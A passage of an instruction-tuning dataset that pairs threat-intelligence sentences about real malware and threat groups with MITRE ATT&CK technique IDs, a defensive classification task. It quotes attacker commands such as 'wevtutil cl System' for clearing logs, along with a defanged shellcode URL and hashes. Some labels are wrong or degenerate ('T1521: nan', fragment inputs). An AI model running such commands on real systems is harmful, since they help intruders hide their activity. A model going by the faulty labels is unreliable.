Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk has attempted to adjust its token privileges to have the SeDebugPrivilege.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilGrab has the capability to capture screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used custom DLLs for continuous retrieval of data from memory.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Domain names are the human readable names used to represent one or more IP addresses.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore has used Python scripts to execute payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has used ProxyBot, which allows the attacker to redirect traffic from the current node to the backconnect server via Sock4\Socks5.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proxysvc registers itself as a service on the victim’s machine to run as a standalone process.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA551 has used encoded ASCII text for initial C2 communications.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sibot has downloaded a DLL to the C:\windows\system32\drivers\ folder and renamed it with a .sys extension.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has archived victim's data prior to exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may inject malicious code into processes via the asynchronous procedure call queue in order to evade process-based defenses as well as possibly elevate privileges.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volgmer installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkComet has the option to compress its payload using UPX or MPRESS.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In one instance, APT29 created a Filter named BfeOnServiceStartTypeChange (Figure 1), which they configured to execute every Monday, Tuesday, Thursday, Friday, and Saturday at 11:33 am local time.  Figure 1: “BfeOnServiceStartTypeChange” WMI Query Language (WQL) filter condition The BfeOnServiceStartTypeChange Filter was bound to the CommandLineEventConsumer WindowsParentalControlsMigration### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth has used malicious VBS e-mail attachments for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE uses the SmartAssembly obfuscator to pack an embedded .Net Framework assembly used for C2.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has been packed with the UPX packer.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Duqu creates a new service that loads a malicious driver when the system starts.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A 256-bit AES session key is generated and used to encrypt both message headers and bodies separately### Assistant: T1521: nan" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk can use anti-disassembly and code transformation obfuscation techniques.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Launchctl interfaces with launchd, the service management framework for macOS.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RGDoor establishes persistence on webservers as an IIS module.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The following shows the specific IP addresses or strings used by the C2 to transmit a success or cancel message depending on the type of DNS query used for C2 communications: DNS Type Successful Cancel A,AC 1.1.1.\d+ 1.2.9.\d+ AAAA 2a00:: 2200:: CNAME,MX,TXT,SRV,SOA ok cancel After providing system specific information, the payload will Interact with the C2 server to obtain commands, which the payload refers to as jobs### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 malware is also obfuscated using Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may generate these credential materials in order to gain access to web resources.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has compromised personal email accounts through the use of legitimate credentials and gathered additional victim information.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 actors have compressed data from remote systems and moved it to another staging system before exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sibot has used a legitimate compromised website to download DLLs to the victim's machine.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some of the information may help adversaries to further their operation within a network.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Alternatively, the adversary may send an AS-REQ message for each user.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang malware RoyalCli and BS2005 have communicated over HTTP with the C2 server through Internet Explorer by using the COM interface IWebBrowser2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot module shareDll/mshareDll discovers network shares via the WNetOpenEnumA API.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mapping of TG-3390's interactions with web shells during an intrusion responded to by CTU researchers### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used net.exe in a script with net accounts /domain to find the password policy of a domain.### Assistant: T1201: Password Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bxaki obfuscated function### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury has installed a self-signed RPM package mimicking the original system package on RPM based systems.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Following the successful injection of SUNBURST, SUNSPOT deleted a temporary file it created named InventoryManager.bk after restoring the original SolarWinds Orion source code to the software library.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT can act as a reverse proxy.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Olympic Destroyer contains a module that tries to obtain credentials from LSASS, similar to Mimikatz.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has used base64 to encode command and control traffic.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao can proxy traffic through multiple infected systems.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BitPaymer has set the run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner is typically bundled with pirated copies of Virtual Studio Technology for Windows and macOS.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can identify the installed antivirus product on a targeted system.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Filename Part-II.doc File Size 10156713 bytes MD5 e32668e569362c96cc56db368b7e821e SHA1 dadc493abbe3e21610539e1d5a42f523626a6132 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file mico-audio.exe### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has delivered spearphishing emails that contain a zipped file with malicious contents.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A JHUHUGIT variant takes screenshots by simulating the user pressing the ""Take Screenshot"" key , accessing the screenshot saved in the clipboard, and converting it to a JPG image.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azorult can recursively search for files in folders and collects files from the desktop with certain extensions.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon can collect the IP address of the victims and other computers on the network using the commands: ipconfig -all nbtstat -n, and nbtstat -s. NanoCore gathers the IP address from the victim’s machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX/Shlayer can base64-decode and AES-decrypt downloaded payloads.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Duqu will inject itself into different processes to evade detection.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT has injected its orchestrator DLL into explorer.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA459 has used PowerShell for execution of a payload.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa used malicious e-mail attachments to lure victims into executing LNK files.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Drovorub can transfer files from the victim machine.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For operations incorporating social engineering, the utilization of an online persona may be important.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Javali has used the MSI installer to download and execute malicious payloads.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DropBook has checked for the presence of Arabic language in the infected machine's settings.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Calisto collects Keychain storage data and copies those passwords/tokens to a file.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has used AES and XOR to decrypt its DLLs.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious Control Panel items can be delivered via Phishing campaigns or executed as part of multi-stage malware.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kessel has trojanized the ssh_login and user-auth_pubkey functions to steal plaintext credentials.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These persistence mechanisms can work within Outlook or be used through Office 365.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If you compare the HTTP GET request from the RIPTIDE samples (Figure 1) to the HTTP GET request from the HIGHTIDE samples (Figure 3) you can see the malware author changed the following items: User Agent Format and structure of the HTTP Uniform Resource Identifier (URI) Figure 3: HIGHTIDE GET Request Example Similar to RIPTIDE campaigns, APT12 infects target systems with HIGHTIDE using a Microsoft Word (.doc) document that exploits CVE-2012-0158### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception has obtained and used open-source tools such as LaZagne.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SEASHARPEE can timestomp files on victims using a Web shell.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has used malware like WhiskeyAlfa to overwrite the first 64MB of every drive with a mix of static and random buffers.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Typically, management services over commonly used ports are used when stuffing credentials.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Doki has used a script that gathers information from a hardcoded list of IP addresses and uploads to an Ngrok URL.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JPIN can obtain network information, including DNS, IP, and proxies.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It named Meterpreter as a WAV file type, probably in the hope that this would not raise suspicions### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VERMIN can get a list of the processes and running tasks on the system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has been observed leveraging a module that can scrape email addresses from Outlook.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec has a package that collects documents from any inserted USB sticks.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These changes will be isolated and only visible within the context of the transaction.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkVishnya used network sniffing to obtain login data.### Assistant: T1040: Network Sniffing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used FTP to download additional malware to the target machine.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The BONDUPDATER script, which was named based on the hard-coded string “B007”, uses a custom DGA algorithm to generate subdomains for communication with the C2 server### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie encrypts command and control communications with RC4.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VERMIN gathers the username from the victim’s machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stealth Falcon malware communicates with its C2 server via HTTPS.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has exploited Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570 for execution during delivery.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has disguised a Cobalt Strike beacon as a Flash Installer.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, a compromised login page may log provided user credentials before logging the user in to the service.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elderwood has delivered zero-day exploits and malware to victims via targeted emails containing a link to malicious content hosted on an uncommon Web server.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used spearphishing emails to deliver BrainTest as a malicious attachment.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet checks for specific operating systems on 32-bit machines, Registry keys, and dates for vulnerabilities, and will exit execution if the values are not met.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TAINTEDSCRIBE has used FileReadZipSend to compress a file and send to C2.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The dropped executable (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9) contains the compressed FELIXROOT dropper component in the Portable Executable (PE) binary overlay section### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has cleared event logs, including by using the commands wevtutil cl System and wevtutil cl Security.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BitPaymer can import a hard-coded RSA 1024-bit public key, generate a 128-bit RC4 key for each file, and encrypt the file in place, appending .locked to the filename.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has the ability to copy files and download/upload files into C2 channels using FTP and HTTPS.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,COM and execution in same sentence ### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BISCUIT can capture keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may put in place resources that are referenced by a link that can be used during targeting.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SslMM sends information to its hard-coded C2, including OS version, service pack information, processor speed, system name, and OS install date.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.### Assistant: T1011: Exfiltration Over Other Network Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky has two hard-coded domains for C2 servers; if the first does not respond, it will try the second.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.### Assistant: T1531: Account Access Removal" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BendyBear has used a custom RC4 and XOR encrypted protocol over port 443 for C2.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus can install itself as a service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpeakUp uses the whoami command.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Asymmetric encryption algorithms are those that use different keys on each end of the channel.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 has signed its malware with an invalid digital certificates listed as “Tencent Technology Company Limited.” Windshift has used revoked certificates to sign malware.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clop can use msiexec.exe to disable security tools on the system.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound malware is capable of keylogging.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has used malicious links to lure victims into downloading malware.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conficker resets system restore points and deletes backup files.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can capture all keystrokes on a compromised host.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Helminth can use HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TinyZBot supports execution from the command-line.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has copied itself to and infected files in network drives for propagation.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,captures keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has dropped RegAsm.exe onto systems for performing malicious activity.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER may collect information about the system by running hostname and systeminfo on a victim.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StoneDrill has a disk wiper module that targets files other than those in the Windows directory.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike's execute-assembly command can run a .NET executable within the memory of a sacrificial process by loading the CLR.### Assistant: T1620: Reflective Code Loading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,build_downer has the ability to detect if the infected host is running an anti-virus process.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The skills needed may be located in-house, or may need to be contracted out.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater decoded base64-encoded PowerShell commands using a VBS file.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has created scheduled tasks to maintain Machete's persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can collect jpeg files from connected MTP devices.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,/user : Executes downloaded file with parameters specified using CreateProcessAsUser cmd /c : Executes command on infected endpoint  Conclusion  The actor behind Honeybee has been operating with new implants since at least November 2017 with the first known version of NTWDBLIB installer### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX can use the Windows API function CreateProcess to execute another process.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TRITON encoded the two inject.bin and imain.bin payloads.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,User Unix Shells execute several configuration scripts at different points throughout the session based on events.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SynAck enumerates all running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT can use SSL/TLS encryption for its HTTP-based C2 channel.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOWDRIFT uses cloud based services for C2.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This document was alleged to have been written by the Ministry of Reunification as demonstrated by the logo in the top left.Similar to the ""Golden Time"" campaign, this document exploits an EPS vulnerability in order to download and execute shellcode located on a compromised website:hxxp://60chicken[.]co[.]kr/wysiwyg/PEG_temp/logo1.pngThe fake image usage is a common pattern for this group### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By compromising DNS servers, adversaries can alter DNS records.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used time /t and net time \\ip/hostname for system time discovery.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-1314 actors used a victim's endpoint management platform, Altiris, for lateral movement.### Assistant: T1072: Software Deployment Tools" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN5 uses SDelete to clean up the environment and attempt to prevent detection.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The ""Uploader"" variant of HAMMERTOSS visits a hard-coded server over HTTP/S to download the images HAMMERTOSS uses to receive commands.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,P.A.S.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX/Shlayer can use bash scripts to check the macOS version, download payloads, and extract bytes from files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Link shortening services can also be employed.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EVILNUM has changed the creation date of files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 queried the Registry to identify victim information.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malware used by Group5 is capable of capturing keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AuditCred can inject code from files to other running processes.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SideTwist has the ability to search for specific files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FLIPSIDE uses RDP to tunnel traffic from a victim environment.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many benign tasks and services exist that have commonly associated names.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StreamEx has the ability to remotely execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse scripting or built-in command line interpreters on network devices to execute malicious command and payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has encrypted configuration files.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BONDUPDATER can read batch commands in a file sent from its C2 server and execute them with cmd.exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pisloader has a command to collect victim system information, including the system name and OS version.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater uses various techniques to bypass UAC.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conficker downloads an HTTP server to the infected machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT can query and kill system processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 actors use the Hunter tool to conduct network service discovery for vulnerable systems.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq creates a backdoor through which remote attackers can download files and additional malware components.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Whitefly has consistently used a technique known as search order hijacking to run Vcrodat.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBStealer has several commands to delete files associated with the malware from the victim.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro has used compromised websites and Google Ads to bait victims into downloading its installer.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WinMM collects the system name, OS version including service pack, and system install date and sends the information to the C2 server.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may hijack domains and/or subdomains that can be used during targeting.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For the print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the GetPrintProcessorDirectory API call.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather employee names that can be used during targeting.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If running in a Windows environment, Kazuar saves a DLL to disk that is injected into the explorer.exe process to execute the payload.### Assistant: T1055: 